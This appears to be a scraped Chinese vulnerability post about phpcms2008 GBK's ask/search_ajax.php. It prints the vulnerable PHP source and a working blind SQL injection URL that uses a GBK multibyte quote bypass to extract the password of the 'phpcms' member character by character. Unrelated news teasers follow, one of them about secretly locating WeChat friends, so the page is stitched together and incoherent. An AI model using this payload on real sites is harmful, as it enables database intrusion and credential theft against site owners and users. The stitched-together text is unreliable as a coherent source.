受影响程序: phpcms2008 gbk
漏洞文件:ask/search_ajax.php
code:
<?php
require './include/common.inc.php';
require_once MOD_ROOT.'include/ask.class.php';
$ask = new ask();
header('Content-type: text/html; charset=utf-8');
if(strtolower(CHARSET) != 'utf-8') $q = iconv(CHARSET, 'utf-8', $q);
if($q)
{
$where = " title LIKE '%$q%' AND status = 5";
}
else
{
exit('null');
}
$infos = $ask->listinfo($where, 'askid DESC', '', 10);
foreach($infos as $key=>$val)
{
$val['title'] = str_replace($q, '<span class="ccb2-9287-4c4b-9880 c_orange">'.$q.'</span>', $val['title']);
$info[$key]['title'] = CHARSET != 'utf-8' ? iconv(CHARSET, 'utf-8', $val['title']) : $val['title'];
$info[$key]['url'] = $val['url'];
}
echo(json_encode($info));
?>
测试 *** :
ask/search_ajax.php?q=s%E6'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23
当今,固然上网很利便,但许多小同伴秀都稀饭用少许小贴士。许多人想晓得微信是否能隐秘定位密友地位,但连续没有人发掘。辣么该奈何做呢?咱们和小编一路来看看。微信怎么定位不让他知道微信的定位能不被对方发觉吗...
各种各样的QQ群和微信群突然成为人们生活的一部分。 与生活圈一样,在“群体性生活”中也有人们喜欢的人和内容,但同时也有截然相反的人和内容。 只要你进入这个生命周期,你就必须接受好的和坏的。 来自...
当你遇到这种情况是,十有八九是要被黑了,黑网站方也会找各种借口来骗你,来忽悠你:说什么网络异常你的账户异常登录、网站维护、网站出款端口维护、账户涉嫌套利、系统自动抽查审核、网站抽查审核、账户违规、风控...
苹果的状态页面显示,通过FaceTime进行的群组通话“暂时不可用”—— 这是一个止损举动,同时,苹果本周将对此问题提供更完善的解决方案。不久之前我们前尝试设置群组通话时无果,但是现在漏洞已经被修复了...
据路透社报道,英特尔(Intel)本周承认,在近两年出售的英特尔处理器(包括最新的第8代核心处理器系列)上都被发现了多个严重的安全漏洞(bug)。而这些安全漏洞主要集中在Intel芯片的“管理引擎...
(原标题:4900万!主播违约跳槽竞争对手,被判支付虎牙天价违约金)主播违约跳槽竞争对手,被判支付虎牙4900万违约金澎湃新闻记者 陈宇曦 综合报道游戏主播“嗨氏”要为自己的违约行为付出4900万米的...